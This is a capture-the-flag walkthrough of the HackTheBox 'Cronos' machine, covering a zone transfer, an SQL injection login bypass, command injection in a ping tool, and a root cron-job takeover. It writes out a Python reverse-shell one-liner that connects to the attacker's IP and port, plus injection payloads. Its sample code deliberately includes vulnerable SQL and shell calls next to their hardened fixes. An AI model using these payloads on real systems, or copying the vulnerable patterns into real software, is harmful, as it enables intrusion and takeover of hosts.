Cronos - HackTheBox WriteUp

Hello, and welcome to my article about the Cronos machine in HTB.

This is the first article that I will be publishing on retired HTB machines for people who want to prepare for the OSCP. The full list of OSCP-like machines can be found here.

First, let's scan for ports with Nmap:
nmap -sC -A -p- 10.10.10.13
-sC – Runs Nmap's default NSE scripts
-A – Aggressive scan: OS detection, version detection, script scanning and traceroute
-p- – Scans all 65535 TCP ports instead of the default top 1000

As we can see, we have three open ports:
SSH – 22
DNS (domain) – 53
HTTP – 80
Nmap also identifies the host as Linux.

Let's browse to the HTTP server on port 80, and we land on the default Apache page:

I ran Dirbuster to look for hidden directories – nothing.
When a server answers with its default page, the real site is often served only under a name-based virtual host, so we need the hostname the web server expects.
Once we find it, we add it to /etc/hosts – the local file that maps hostnames to IP addresses before any DNS lookup happens – so the browser sends the right Host header.
DNS (port 53) is open on the target itself, so we ask that server for a reverse lookup of its own address with nslookup.

In nslookup, type server 10.10.10.13 to point it at the target's DNS server, then query the machine's own IP, 10.10.10.13. The reverse lookup gives us the domain name: cronos.htb!

Now add cronos.htb to /etc/hosts, pointing at 10.10.10.13, and save.

Open Firefox and type cronos.htb in the URL bar:

The site loads successfully.
As usual, when we find a website, we run Dirbuster against it:

Unfortunately, it does not find any useful directories or files.

Next, let's try a DNS zone transfer (AXFR). The target's own name server is authoritative for cronos.htb, and a server that does not restrict transfers will hand us the whole zone. The command is:
host -l cronos.htb 10.10.10.13

We got the zone's records, which reveal more hostnames.
Add the interesting ones to /etc/hosts as well:
www.cronos.htb and admin.cronos.htb
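Parsing the zone-transfer output by hand is fine for four records, but larger zones are tedious. The script below is an added example (not part of the original writeup): it parses `host -l` style output into hostname/IP pairs and prints ready-made /etc/hosts lines. The sample output is constructed to resemble a transfer for cronos.htb; the real zone may contain other records.

```python
"""Parse `host -l <zone> <server>` (AXFR) output into /etc/hosts lines.

Added example, not part of the original writeup.  SAMPLE_AXFR is constructed
to look like a zone transfer for cronos.htb; the real zone may differ.
"""
import re

# Constructed sample of `host -l cronos.htb 10.10.10.13` output (illustrative).
SAMPLE_AXFR = """\
Using domain server:
Name: 10.10.10.13
Address: 10.10.10.13#53
Aliases:

cronos.htb name server ns1.cronos.htb.
cronos.htb has address 10.10.10.13
admin.cronos.htb has address 10.10.10.13
ns1.cronos.htb has address 10.10.10.13
www.cronos.htb has address 10.10.10.13
"""

# `host -l` prints one "<name> has address <ip>" line per A record (and
# "has IPv6 address" for AAAA); header lines and NS records do not match.
A_RECORD = re.compile(r"^(?P<name>\S+) has (?:IPv6 )?address (?P<ip>\S+)$")


def parse_axfr(text):
    """Return {hostname: ip} for every A/AAAA record in host -l output."""
    records = {}
    for line in text.splitlines():
        m = A_RECORD.match(line.strip())
        if m:
            records[m.group("name").rstrip(".")] = m.group("ip")
    return records


def hosts_lines(records):
    """Group hostnames by IP into /etc/hosts-style lines, one per address.

    Names with fewer labels (the zone apex) come first, then alphabetical,
    so the output is stable across runs.
    """
    by_ip = {}
    for name, ip in records.items():
        by_ip.setdefault(ip, []).append(name)
    lines = []
    for ip in sorted(by_ip):
        names = sorted(by_ip[ip], key=lambda n: (n.count("."), n))
        lines.append(f"{ip} {' '.join(names)}")
    return lines


if __name__ == "__main__":
    for line in hosts_lines(parse_axfr(SAMPLE_AXFR)):
        print(line)  # append these lines to /etc/hosts on the attacking box
```

Pipe the real transfer into it (`host -l cronos.htb 10.10.10.13 | python3 axfr_hosts.py`) if you adapt `__main__` to read stdin; the parser itself does not need the network.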

Let's visit the interesting one, admin.cronos.htb, which shows a login page.

I tried some default credentials such as:
admin / admin
admin / Cronos
None of them worked.
We could run Hydra or another brute-force tool, but before that it is cheaper to check for SQL injection.
First, I want to explain what is SQLi.

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior.

Now that you understand what an SQLi attack is, let's try some basic payloads to bypass the login page.
I tried this payload in the username field: admin' OR '1'='
The single quote closes the string the application wraps around our input, and the OR that follows makes the WHERE clause true for the admin row regardless of what the password comparison returns, so the query behaves as if we had authenticated.

We bypassed the login page successfully!!
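To make the bypass concrete, here is an added example (not the Cronos application's source, which we never see) that rebuilds the typical login query with string concatenation, runs the page's payload against it in an in-memory SQLite table, and shows the parameterised version that defeats it. The table and the stored credentials are constructed.

```python
"""Why `admin' OR '1'='` bypasses the login: vulnerable vs. parameterised query.

Added example, not taken from the Cronos admin panel.  It assumes a PHP-style
login that pastes both fields into the SQL text; the users table is constructed.
"""
import sqlite3

# Constructed users table standing in for the admin panel's database.
db = sqlite3.connect(":memory:")
db.execute("CREATE TABLE users (username TEXT, password TEXT)")
db.execute("INSERT INTO users VALUES ('admin', 'not-guessable-here')")
db.commit()


def build_vulnerable_query(username, password):
    """The classic bug: user input becomes part of the SQL syntax."""
    return (f"SELECT username FROM users WHERE username = '{username}' "
            f"AND password = '{password}'")


def vulnerable_login(username, password):
    """Return the matched username or None; any row at all means 'logged in'."""
    row = db.execute(build_vulnerable_query(username, password)).fetchone()
    return row[0] if row else None


def safe_login(username, password):
    """Same check with bound parameters: the quote is data, never SQL syntax."""
    row = db.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    payload = "admin' OR '1'='"
    print(build_vulnerable_query(payload, "anything"))
    # ... WHERE username = 'admin' OR '1'='' AND password = 'anything'
    # AND binds tighter than OR, so this reads
    #     username = 'admin'  OR  ('1'='' AND password = 'anything')
    # and the left side is true for the existing admin row.
    print(vulnerable_login(payload, "anything"))   # admin
    print(safe_login(payload, "anything"))         # None
```

The comment-based variant `' OR 1=1 -- ` works against the same query for a different reason: it truncates the password check entirely, so it succeeds even when the injected OR would otherwise be swallowed by the AND.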
After we log in, we see a tool called "Net Tool v0.1" that pings an IP address we supply, for example:

That is a classic place to look for "Command Injection", a vulnerability that lets us execute commands on the host operating system because the application passes our input to a shell.

There are several ways to carry out the attack; shell metacharacters such as ;, &&, | or $( ) all work if the input is not filtered.
I tried:
8.8.8.8 | ls

The pipe ends the ping command and runs ls, and its output comes back in the page. We have RCE!
Now let's turn this into a reverse shell by appending a Python one-liner after the pipe:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("IP",PORT));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

Change IP and PORT to your own address and listening port, start a listener (netcat will do) on that port, submit the payload and boom! Reverse shell!
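The following is an added example, not the Net Tool source (which we never see): it reconstructs the kind of ping helper that `8.8.8.8 | ls` exploits, then shows the fix a practitioner would expect, which is validating the target as an IP or hostname and running ping without a shell. Function names and the hostname pattern are ours.

```python
"""Command injection in a 'ping this IP' helper, and the hardened version.

Added example reconstructing the bug class, not the Cronos application's code.
"""
import ipaddress
import re
import subprocess

# RFC 1123-style hostname: labels of letters, digits and inner hyphens.
HOSTNAME_RE = re.compile(
    r"^(?=.{1,253}$)[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(\.[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*$"
)


def ping_vulnerable(target):
    """shell=True: `|`, `;`, `&&` and `$(...)` in target become shell syntax."""
    cmd = f"ping -c 1 {target}"
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout


def is_valid_target(target):
    """True only for an IP literal or a DNS hostname; spaces and
    metacharacters fail both checks."""
    try:
        ipaddress.ip_address(target)
        return True
    except ValueError:
        return HOSTNAME_RE.match(target) is not None


def ping_argv(target):
    """Build the argv list; with no shell involved, metacharacters are inert."""
    if not is_valid_target(target):
        raise ValueError(f"refusing suspicious target: {target!r}")
    return ["ping", "-c", "1", target]


def ping_safe(target):
    proc = subprocess.run(ping_argv(target), capture_output=True, text=True)
    return proc.stdout


if __name__ == "__main__":
    # The pipe discards ping's result and runs whatever follows it.
    print(ping_vulnerable("127.0.0.1 | id"))
    try:
        ping_safe("127.0.0.1 | id")
    except ValueError as e:
        print(e)
```

Validation alone is not the defence; the argv list is. Even a whitelist can be bypassed by an allowed-looking value if it is still interpolated into a shell string, so keep both halves of the fix.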

Once I had a shell, I transferred lse.sh (linux-smart-enumeration) to the box: serve it from the attacking machine with a Python web server and fetch it on the target with wget.
Make it executable and run it!
The script finds an interesting entry in the system crontab:
/var/www/laravel/artisan – a PHP script (Laravel's command-line tool) that a cron job runs as root.

What are crontab / cron jobs?
Cron is the scheduler that runs commands or scripts at fixed times or intervals; the crontab is the table that defines those jobs.

A cron job runs with the privileges of its owner: the user column in /etc/crontab (or /etc/cron.d), or the user whose personal crontab it lives in.

Now that crontab is covered, let's continue.
The script at /var/www/laravel/artisan lives under the web root, so as www-data we probably have permission to modify it. Check the file's owner and mode:

Yes, we have full permissions over the file!
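This is the check lse.sh did for us, written out as an added example (not lse.sh itself, and not the exact heuristic it uses): parse /etc/crontab-style text, keep the jobs owned by root, extract the files each job executes (including a script handed to an interpreter such as php), and report any that the current user can write to. The crontab text is constructed to resemble the Cronos job, and the writability check is injectable so it can be exercised without the real files.

```python
"""Find root cron jobs that execute a file the current user can write to.

Added example; not lse.sh.  SAMPLE_CRONTAB is constructed, not a capture.
"""
import os
import re
import shlex

# Constructed /etc/crontab content (illustrative).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
* * * * *       root    php /var/www/laravel/artisan schedule:run >> /dev/null 2>&1
*/5 * * * *     www-data /usr/local/bin/cleanup.sh
"""

INTERPRETERS = {"php", "python", "python3", "perl", "bash", "sh"}
OPERATORS = re.compile(r"\s*(?:&&|\|\||;|\|)\s*")


def parse_system_crontab(text):
    """Return (user, command) for each job in /etc/crontab or /etc/cron.d format.

    Per-user crontabs (crontab -l) have no user column and are not handled here.
    """
    jobs = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue                      # blank, comment, or VAR=value
        if line.startswith("@"):          # @daily user command
            fields = line.split(None, 2)
            if len(fields) == 3:
                jobs.append((fields[1], fields[2]))
            continue
        fields = line.split(None, 6)      # 5 schedule fields, user, command
        if len(fields) == 7:
            jobs.append((fields[5], fields[6]))
    return jobs


def executed_paths(command):
    """Programs the command runs, plus the script given to an interpreter.

    `a && b | c` is split into segments; redirections are left in argv but
    never occupy argv[0] or argv[1] of an interpreter call in practice.
    """
    paths = []
    for segment in OPERATORS.split(command):
        argv = shlex.split(segment)
        if not argv:
            continue
        prog = argv[0]
        paths.append(prog)
        if (os.path.basename(prog) in INTERPRETERS
                and len(argv) > 1 and not argv[1].startswith("-")):
            paths.append(argv[1])
    return paths


def writable_root_jobs(text, is_writable=lambda p: os.access(p, os.W_OK)):
    """(command, path) pairs where root executes something we can modify.

    Only absolute paths are checked; bare names like `php` resolve via PATH.
    """
    hits = []
    for user, command in parse_system_crontab(text):
        if user != "root":
            continue
        for path in executed_paths(command):
            if path.startswith("/") and is_writable(path):
                hits.append((command, path))
    return hits


if __name__ == "__main__":
    for command, path in writable_root_jobs(SAMPLE_CRONTAB):
        print(f"root runs [{command}] and {path} is writable by us")
```

On a real box, feed it `cat /etc/crontab /etc/cron.d/*` and keep the default `is_writable`; the injected version in the test stands in for a filesystem where only artisan is ours.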
Since the job runs as root, whatever we place in that file will be executed as root, so we replace it with the pentestmonkey PHP reverse shell.
How do we do that?
Copy the content of the PHP reverse shell from this URL:
https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

On our Kali machine, create a file called "artisan", paste the payload into it and change the IP and PORT to our listener.

Start the Python web server again and transfer the file to the victim machine.
Delete the original artisan on the victim first (better: move it aside as a backup so the cron job can be restored later), then fetch our version into its place.

Open a listener and wait for communication.

That's it! The cron job fires and we get a root shell!
All that's left is to read root.txt and copy the flag!

I hope you find this article useful!
